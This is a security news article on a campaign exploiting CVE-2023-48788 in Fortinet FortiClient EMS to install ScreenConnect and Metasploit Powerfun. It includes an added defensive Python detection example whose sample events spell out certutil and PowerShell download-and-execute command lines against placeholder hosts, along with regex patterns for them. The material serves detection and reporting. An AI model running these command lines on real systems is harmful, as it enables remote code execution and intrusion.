Cybersecurity researchers have discovered a new campaign that is exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.
The activity involves the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could allow an unauthenticated attacker to execute unauthorized code or commands via specially crafted requests.
Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun owing to the use of ScreenConnect and Powerfun for post-exploitation.
The intrusion targeted an unnamed media company that had its vulnerable FortiClient EMS device exposed to the internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the next couple of days, the unknown adversary was observed leveraging the flaw to unsuccessfully download ScreenConnect and then install the remote desktop software using the msiexec utility.
However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit’s Powerfun script and initiated a reverse connection to a different IP address.
Also detected were SQL statements designed to download ScreenConnect from a remote domain (“ursketz[.]com”) using certutil, which was then installed via msiexec before establishing connections with a command-and-control (C2) server.
There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically singling out Fortinet appliances and using the Vietnamese and German languages in their infrastructure.
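The download-and-install chain described above (certutil fetching an MSI, msiexec installing it, PowerShell pulling a script and calling back) leaves a recognisable trail in process-creation telemetry. The following is an added example of how a defender might match that trail over endpoint events; it is not code from the article or from Forescout. The sample events are constructed, the hostnames are placeholders, and treating sqlservr.exe as the parent process is an assumption based on FortiClient EMS being backed by Microsoft SQL Server.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent process image name
    image: str    # process image name
    cmdline: str  # full command line


# Constructed sample process-creation events modelled on the chain in the
# article: certutil download -> msiexec install, plus a PowerShell download
# cradle. The parent "sqlservr.exe" is an assumption (EMS uses MS SQL);
# the hostnames are placeholders, not indicators from the article.
SAMPLE_EVENTS = [
    ProcEvent("sqlservr.exe", "cmd.exe",
              "cmd.exe /c certutil -urlcache -split -f "
              "http://files.example.invalid/ScreenConnect.ClientSetup.msi "
              "C:\\Windows\\Temp\\sc.msi"),
    ProcEvent("sqlservr.exe", "msiexec.exe",
              "msiexec /i C:\\Windows\\Temp\\sc.msi /qn"),
    ProcEvent("sqlservr.exe", "powershell.exe",
              "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://c2.example.invalid/powerfun.ps1')\""),
    # Benign: an interactive admin installing a package from Downloads.
    ProcEvent("explorer.exe", "msiexec.exe",
              "msiexec /i C:\\Users\\ops\\Downloads\\7zip.msi"),
]

# Command-line patterns for each stage of the observed chain.
RULES = {
    "certutil_download": re.compile(
        r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.I),
    "powershell_download_cradle": re.compile(
        r"\b(DownloadString|DownloadFile|IEX|Invoke-Expression)\b", re.I),
    "msiexec_quiet_install_from_temp": re.compile(
        r"msiexec(\.exe)?\s.*/i\s+\S*\\temp\\\S+\.msi", re.I),
}

# A database engine should not be spawning shells or installers at all.
SUSPICIOUS_PARENTS = {"sqlservr.exe"}


def classify(ev):
    """Return the names of every rule the event triggers (empty if none)."""
    hits = [name for name, rx in RULES.items() if rx.search(ev.cmdline)]
    if ev.parent.lower() in SUSPICIOUS_PARENTS:
        hits.append("spawned_by_database_engine")
    return hits


def find_alerts(events):
    """Return (image, [rule names]) for each event that triggers a rule."""
    alerts = []
    for ev in events:
        hits = classify(ev)
        if hits:
            alerts.append((ev.image, hits))
    return alerts
```

Running `find_alerts(SAMPLE_EVENTS)` flags the three events parented by the database engine and leaves the interactive msiexec install alone; in practice the same rules would be applied to Sysmon or EDR process-creation logs.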
“The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts,” security researcher Sai Molige said.
“This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances.”
Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Organizations are recommended to apply the patches provided by Fortinet to address potential threats, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.